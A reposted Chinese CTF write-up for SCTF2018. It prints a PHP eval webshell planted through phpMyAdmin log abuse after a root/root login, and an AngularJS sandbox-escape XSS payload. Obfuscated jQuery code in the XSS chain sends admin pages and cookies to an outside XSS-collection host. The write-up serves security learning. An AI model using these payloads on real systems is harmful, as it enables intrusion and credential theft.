當(dāng)前位置：首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

SCTF2018 Writeup

發(fā)布時(shí)間：2023/12/8 编程问答 38 豆豆

生活随笔收集整理的這篇文章主要介紹了 SCTF2018 Writeup 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

_____ _____ _______ ______ / ____|/ ____|__ __| ____|| (___ | | | | | |__ \___ \| | | | | __| ____) | |____ | | | | |_____/ \_____| |_| |_|

__________WEB_____________

0x01 easiest web – phpMyAdmin

思路：弱口令（root / root）登陸phpmyadmin，利用日志功能進(jìn)行g(shù)etshell

送分題，輕松一下http://47.97.214.247:20001/phpmyadmin Alternate address：http://218.245.4.98:20000/phpmyadmin

開啟日志，寫入一句話

查詢sql語句

<?php @eval($_POST['cmd']);?>

日志寫入到網(wǎng)站路徑下的dasdasdas.php文件

然后就getshell

http://218.245.4.98:20000/dasdasdad.php 密碼：cmd菜刀連接

在C盤發(fā)現(xiàn)flag

sctf{31cf2213cc49605a30f07395d6e5b9c4}

0x02??新的建議板

?解題思路：從前臺(tái)發(fā)現(xiàn)留言板存在anjularjs的模板注入?，js中發(fā)現(xiàn)api接口，發(fā)現(xiàn)需要另外一個(gè)管理員賬號(hào)post帶入訪問密碼才能獲取到flag

師傅最近開始學(xué)前端想寫個(gè)建議板后來失敗了？http://116.62.137.114:4879

Anjularjs的模板注入?

Payload:?

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}}

?用eval(atob("base64"))進(jìn)行base64加密，繞過過濾

1.1 利用xss獲取管理員后臺(tái)地址

xss平臺(tái)地址：

http://xsspt.com/aQCIrX?1529652200

使用getScript方法動(dòng)態(tài)加載JS：

$.getScript('http://xsspt.com/aQCIrX?1529652200'); >>base64 >> JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK

eval(atob("JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK"));

在留言板輸入下面Payload 可以打到管理員的后臺(tái)地址和cookie：

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}

location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK%5C'));//');%7D%7D%0D%0A

url解碼：

location : http://127.0.0.1:1002/admin/suggest?suggest={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}

可以發(fā)現(xiàn)后臺(tái)地址在內(nèi)網(wǎng)http://127.0.0.1:1002/admin/

1.2 利用Jquery獲取后臺(tái)頁(yè)面源碼

首先在xss平臺(tái)新建模塊如下所示：

代碼：

$.ajax({url: "/admin",type: "GET",dataType: "text",success: function(result) {var code = btoa(encodeURIComponent(result));xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);},error: function(msg) {}})function xssPost(url, postStr) {var de;de = document.body.appendChild(document.createElement('iframe'));de.src = 'about:blank';de.height = 1;de.width = 1;de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');de.contentDocument.forms[0].submit();de.style.display = 'none';}

　　此時(shí)獲取后臺(tái)的xss模塊已經(jīng)建立好，需要在原有模塊上更新使用模塊，默認(rèn)是使用獲取cookie的模塊

然后再在留言板上輸入payload：

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}

?稍等片刻，即可獲取到消息

復(fù)制code后面的base64代碼：

code: JTNjIURPQ1RZUEUraHRtbCUzZSUwZCUwYSUzY2h0bWwrbGFuZyUzZCUyMnpoLUNOJTIyJTNlJTBkJTBhKyslM2NoZWFkJTNlJTBkJTBhKysrKyUzY21ldGErY2hhcnNldCUzZCUyMnV0Zi04JTIyJTNlJTBkJTBhKysrKyUzY21ldGEraHR0cC1lcXVpdiUzZCUyMlgtVUEtQ29tcGF0aWJsZSUyMitjb250ZW50JTNkJTIySUUlM2RlZGdlJTIyJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMnZpZXdwb3J0JTIyK2NvbnRlbnQlM2QlMjJ3aWR0aCUzZGRldmljZS13aWR0aCUyYytpbml0aWFsLXNjYWxlJTNkMSUyMiUzZSUwZCUwYSsrKyslM2MhLS0rJWU0JWI4JThhJWU4JWJmJWIwMyVlNCViOCVhYW1ldGElZTYlYTAlODclZTclYWQlYmUqJWU1JWJmJTg1JWU5JWExJWJiKiVlNiU5NCViZSVlNSU5YyVhOCVlNiU5YyU4MCVlNSU4OSU4ZCVlOSU5ZCVhMiVlZiViYyU4YyVlNCViYiViYiVlNCViZCU5NSVlNSU4NSViNiVlNCViYiU5NiVlNSU4NiU4NSVlNSVhZSViOSVlOSU4MyViZColZTUlYmYlODUlZTklYTElYmIqJWU4JWI3JTlmJWU5JTlhJThmJWU1JTg1JWI2JWU1JTkwJThlJWVmJWJjJTgxKy0tJTNlJTBkJTBhKysrKyUzY21ldGErbmFtZSUzZCUyMmRlc2NyaXB0aW9uJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbWV0YStuYW1lJTNkJTIyYXV0aG9yJTIyK2NvbnRlbnQlM2QlMjIlMjIlM2UlMGQlMGErKysrJTNjbGluaytyZWwlM2QlMjJpY29uJTIyK2hyZWYlM2QlMjIlMjIlM2UlMGQlMGElMGQlMGErKysrJTNjdGl0bGUlM2VTWUMlM2MlMmZ0aXRsZSUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmY3NzJTJmYm9vdHN0cmFwLm1pbi5jc3MlMjIrcmVsJTNkJTIyc3R5bGVzaGVldCUyMiUzZSUwZCUwYSsrKyslM2NsaW5rK2hyZWYlM2QlMjJjc3MlMmZpZTEwLXZpZXdwb3J0LWJ1Zy13b3JrYXJvdW5kLmNzcyUyMityZWwlM2QlMjJzdHlsZXNoZWV0JTIyJTNlJTBkJTBhKysrKyUzY2xpbmsraHJlZiUzZCUyMmNzcyUyZnN0YXJ0ZXItdGVtcGxhdGUuY3NzJTIyK3JlbCUzZCUyMnN0eWxlc2hlZXQlMjIlM2UlMGQlMGErKysrJTNjc3R5bGUrdHlwZSUzZCUyMnRleHQlMmZjc3MlMjIlM2UlMGQlMGErKysrKysrKysrYm9keSslN2IlMGQlMGErKysrKysrKysrKytwYWRkaW5nLXRvcCUzYSs2MHB4JTNiJTBkJTBhKysrKysrKysrKysrcGFkZGluZy1ib3R0b20lM2ErNDBweCUzYiUwZCUwYSsrKysrKysrKyslN2QlMGQlMGErKysrKysrKyUzYyUyZnN0eWxlJTNlJTBkJTBhJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmFuZ3VsYXIuanMlMmYxLjQuNiUyZmFuZ3VsYXIubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmFwcHMuYmRpbWcuY29tJTJmbGlicyUyZmFuZ3VsYXItcm91dGUlMmYxLjMuMTMlMmZhbmd1bGFyLXJvdXRlLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhKysrKyUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllLWVtdWxhdGlvbi1tb2Rlcy13YXJuaW5nLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTBkJTBhKyslM2MlMmZoZWFkJTNlJTBkJTBhJTBkJTBhKyslM2Nib2R5KyUzZSUwZCUwYSUwZCUwYSsrKyslM2NuYXYrY2xhc3MlM2QlMjJuYXZiYXIrbmF2YmFyLWludmVyc2UrbmF2YmFyLWZpeGVkLXRvcCUyMiUzZSUwZCUwYSsrKysrKyUzY2RpditjbGFzcyUzZCUyMmNvbnRhaW5lciUyMiUzZSUwZCUwYSsrKysrKysrJTNjZGl2K2NsYXNzJTNkJTIybmF2YmFyLWhlYWRlciUyMiUzZSUwZCUwYSsrKysrKysrKyslM2NidXR0b24rdHlwZSUzZCUyMmJ1dHRvbiUyMitjbGFzcyUzZCUyMm5hdmJhci10b2dnbGUrY29sbGFwc2VkJTIyK2RhdGEtdG9nZ2xlJTNkJTIyY29sbGFwc2UlMjIrZGF0YS10YXJnZXQlM2QlMjIlMjNuYXZiYXIlMjIrYXJpYS1leHBhbmRlZCUzZCUyMmZhbHNlJTIyK2FyaWEtY29udHJvbHMlM2QlMjJuYXZiYXIlMjIlM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyc3Itb25seSUyMiUzZVRvZ2dsZStuYXZpZ2F0aW9uJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKysrKyUzY3NwYW4rY2xhc3MlM2QlMjJpY29uLWJhciUyMiUzZSUzYyUyZnNwYW4lM2UlMGQlMGErKysrKysrKysrKyslM2NzcGFuK2NsYXNzJTNkJTIyaWNvbi1iYXIlMjIlM2UlM2MlMmZzcGFuJTNlJTBkJTBhKysrKysrKysrKysrJTNjc3BhbitjbGFzcyUzZCUyMmljb24tYmFyJTIyJTNlJTNjJTJmc3BhbiUzZSUwZCUwYSsrKysrKysrKyslM2MlMmZidXR0b24lM2UlMGQlMGErKysrKysrKysrJTNjYStjbGFzcyUzZCUyMm5hdmJhci1icmFuZCUyMitocmVmJTNkJTIyJTJmJTIyJTNlU1lDK0FETUlOJTNjJTJmYSUzZSUwZCUwYSsrKysrKysrJTNjJTJmZGl2JTNlJTBkJTBhKysrKysrKyslM2NkaXYraWQlM2QlMjJuYXZiYXIlMjIrY2xhc3MlM2QlMjJjb2xsYXBzZStuYXZiYXItY29sbGFwc2UlMjIlM2UlMGQlMGErKysrKysrKysrJTNjdWwrY2xhc3MlM2QlMjJuYXYrbmF2YmFyLW5hdiUyMiUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpK2NsYXNzJTNkJTIyYWN0aXZlJTIyJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlSG9tZSUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyJTIzJTIyJTNlJWU2JTk3JWE1JWU1JWJmJTk3JTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTglYjQlYTYlZTUlOGQlOTUlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrKyslM2NsaSUzZSUzY2EraHJlZiUzZCUyMmFkbWluJTJmZmlsZSUyMiUzZSVlNiU5NiU4NyVlNCViYiViNiUzYyUyZmElM2UlM2MlMmZsaSUzZSUwZCUwYSsrKysrKysrKysrKyUzY2xpJTNlJTNjYStocmVmJTNkJTIyYWRtaW4lMmZzdWdnZXN0JTIyJTNlJWU3JTk1JTk5JWU4JWE4JTgwJTNjJTJmYSUzZSUzYyUyZmxpJTNlJTBkJTBhKysrKysrKysrKysrJTNjbGklM2UlM2NhK2hyZWYlM2QlMjIlMjMlMjIlM2UlZTUlOGYlOTElZTUlYjglODMlM2MlMmZhJTNlJTNjJTJmbGklM2UlMGQlMGErKysrKysrKysrJTNjJTJmdWwlM2UlMGQlMGErKysrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKysrKyUzYyUyZmRpdiUzZSUwZCUwYSsrKyslM2MlMmZuYXYlM2UlMGQlMGElMGQlMGElMGQlMGElM2NkaXYrY2xhc3MlM2QlMjJjb250YWluZXIlMjIlM2UlMGQlMGErKyUzY2RpditjbGFzcyUzZCUyMmp1bWJvdHJvbiUyMiUzZSUwZCUwYSsrKysrKysrJTNjaDElM2VIRUxMTythZG1pbkNsb3VuZCUzYyUyZmgxJTNlJTBkJTBhKysrKysrKyslM2NwJTNlJWU2JTk2JWIwJWU3JTg5JTg4JWU1JTkwJThlJWU1JThmJWIwMi4wISUzYyUyZnAlM2UlMGQlMGErKyUzYyUyZmRpdiUzZSUwZCUwYSUzYyUyZmRpdiUzZSUwZCUwYSUwZCUwYSUwZCUwYSsrKyslM2MhLS0rQm9vdHN0cmFwK2NvcmUrSmF2YVNjcmlwdCUwZCUwYSUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCUzZCstLSUzZSUwZCUwYSUzYyEtLStQbGFjZWQrYXQrdGhlK2VuZCtvZit0aGUrZG9jdW1lbnQrc28rdGhlK3BhZ2VzK2xvYWQrZmFzdGVyKy0tJTNlJTBkJTBhJTNjc2NyaXB0K3NyYyUzZCUyMmh0dHBzJTNhJTJmJTJmY2RuLmJvb3Rjc3MuY29tJTJmanF1ZXJ5JTJmMS4xMi40JTJmanF1ZXJ5Lm1pbi5qcyUyMiUzZSUzYyUyZnNjcmlwdCUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJodHRwcyUzYSUyZiUyZmNkbi5ib290Y3NzLmNvbSUyZmJvb3RzdHJhcCUyZjMuMy43JTJmanMlMmZib290c3RyYXAubWluLmpzJTIyJTNlJTNjJTJmc2NyaXB0JTNlJTBkJTBhJTNjIS0tK0lFMTArdmlld3BvcnQraGFjaytmb3IrU3VyZmFjZSUyZmRlc2t0b3ArV2luZG93cys4K2J1ZystLSUzZSUwZCUwYSUzY3NjcmlwdCtzcmMlM2QlMjJqcyUyZmllMTAtdmlld3BvcnQtYnVnLXdvcmthcm91bmQuanMlMjIlM2UlM2MlMmZzY3JpcHQlM2UlMGQlMGElMGQlMGElM2MlMmZib2R5JTNlJTBkJTBhJTNjJTJmaHRtbCUzZSUwZCUwYSUwZCUwYQ==

保存在admin.txt

利用pentestbox進(jìn)行base64解碼

> cat admin.txt |base64 -d

再次進(jìn)行url解碼

解碼結(jié)果保存在admiin.html

<!DOCTYPE html> <html lang="zh-CN"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content=""><meta name="author" content=""><link rel="icon" href=""><title>SYC</title><link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"><link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet"><link href="css/starter-template.css" rel="stylesheet"><style type="text/css">body {padding-top: 60px;padding-bottom: 40px;}</style><script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script><script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script><script src="js/ie-emulation-modes-warning.js"></script></head><body ><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="/">SYC ADMIN</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li class="active"><a href="#">Home</a></li><li><a href="#">日志</a></li><li><a href="#">賬單</a></li><li><a href="admin/file">文件</a></li><li><a href="admin/suggest">留言</a></li><li><a href="#">發(fā)布</a></li></ul></div></div></nav><div class="container"><div class="jumbotron"><h1>HELLO adminClound</h1><p>新版后臺(tái)2.0!</p></div> </div>  <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script> <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>  <script src="js/ie10-viewport-bug-workaround.js"></script></body> </html>

發(fā)現(xiàn)管理員賬號(hào)： adminClound

1.3 利用js api接口，找到文件密碼

在一開始的首頁(yè)里有個(gè)?min-test.js?，這里泄露了admin模板文件view/admintest2313.html，在這個(gè)模板中發(fā)現(xiàn)一個(gè)備忘錄的接口

替換成管理員賬號(hào)，訪問?http://116.62.137.114:4879/api/memos/adminClound

得到文件訪問密碼

拿到文件密碼后，構(gòu)造包訪問?/admin/file頁(yè)面和上面獲取admin頁(yè)面一樣

<!DOCTYPE html> <html lang="zh-CN"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content=""><meta name="author" content=""><link rel="icon" href=""><title>SYC</title><link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"><link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet"><link href="css/starter-template.css" rel="stylesheet"><style type="text/css">body {padding-top: 60px;padding-bottom: 40px;}</style><script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script><script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script><script src="js/ie-emulation-modes-warning.js"></script></head><body ><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="/">SYC ADMIN</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li class="active"><a href="#">Home</a></li><li><a href="#">日志</a></li><li><a href="#">賬單</a></li><li><a href="admin/file">文件</a></li><li><a href="admin/suggest">留言</a></li><li><a href="#">發(fā)布</a></li></ul></div></div></nav><div class="container"><form method="post"><label for="filePasswd" class="sr-only">輸入文件密碼</label><input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd"><button class="btn btn-lg btn-primary btn-block" type="submit">提交</button></form> </div>  <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script> <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>  <script src="js/ie10-viewport-bug-workaround.js"></script></body> </html>

1.4 輸入文件密碼，獲取flag

同樣需要在xss平臺(tái)設(shè)置模塊，并引用該模塊

$.ajax({url: "/admin/file",type: "POST",dataType: "text",data: "filepasswd=HGf^%2639NsslUIf^23",success: function(result) {var code = btoa(encodeURIComponent(result));xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);},error: function(msg) {}})function xssPost(url, postStr) {var de;de = document.body.appendChild(document.createElement('iframe'));de.src = 'about:blank';de.height = 1;de.width = 1;de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');de.contentDocument.forms[0].submit();de.style.display = 'none';}

留言板再次提交payload

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}

稍等片刻即可，查看xss平臺(tái)

code : c2N0ZiU3QlQ0aXNfaXNfZjFhZzIzMTMlN0Q=

base64解碼后再url解碼

sctf{T4is_is_f1ag2313}

________________MiSC ________________

0x03??神奇的Modbus

思路：根據(jù)題目Modbus，只要過濾Modbus協(xié)議，跟隨tcp流就可以找到flag

尋找flag
附件： http://sctf2018.xctf.org.cn/media/task/c7348d96-947d-48ef-a91d-2b3eb647d9a9.zip

下載附件，解壓，用wireshark分析

過濾之前：

過濾之后：

跟隨第一個(gè)tcp 流

找到flag

sctf{Easy_Mdbus}

提交答案發(fā)現(xiàn)不對(duì)

嘗試加個(gè)o，提交正確

sctf{Easy_Modbus}

轉(zhuǎn)載于:https://www.cnblogs.com/Jas502n/p/9228589.html

總結(jié)

以上是生活随笔為你收集整理的SCTF2018 Writeup的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

Writeup

上一篇： unity 输入框弹出输入法_国产输入法
下一篇： fails sanity check错误